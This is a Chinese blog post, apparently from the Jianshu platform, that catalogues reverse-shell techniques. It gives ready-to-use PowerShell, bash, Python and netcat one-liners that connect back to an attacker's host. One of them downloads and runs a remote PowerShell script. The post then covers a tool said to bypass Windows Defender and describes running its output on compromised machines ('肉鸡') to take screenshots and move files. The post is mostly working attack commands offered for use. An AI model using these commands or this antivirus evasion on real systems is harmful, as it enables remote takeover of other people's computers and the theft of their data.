反弹shell的多种姿势

一、常用反弹命令

1、powershell反弹(win7测试可以)
powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress xxx.xxx.xxx.xxx -port 8888
2、 bash反弹(linux)
bash -i >& /dev/tcp/555.666.777.888/4444 0>&1
3、python反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
4、nc反弹
nc 172.16.1.130 4444 -t -e /bin/bash

二、powershell ReverseTCPShell反弹shell

1、该脚本可以bypass windows defender(2019年12月24日)
2、安装
https://github.com/ZHacker13/ReverseTCPShell
3、执行
直接执行ps1脚本可能会失败,使用bypass安全策略执行
powershell.exe -ExecutionPolicy Bypass -File .\ReverseTCP.ps1
4、生成两种命令,一种在cmd执行,一种在ps执行
5、copy命令到肉鸡上执行,反弹成功

image

6、常用命令
screenshot 截屏
dir
upload
download

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容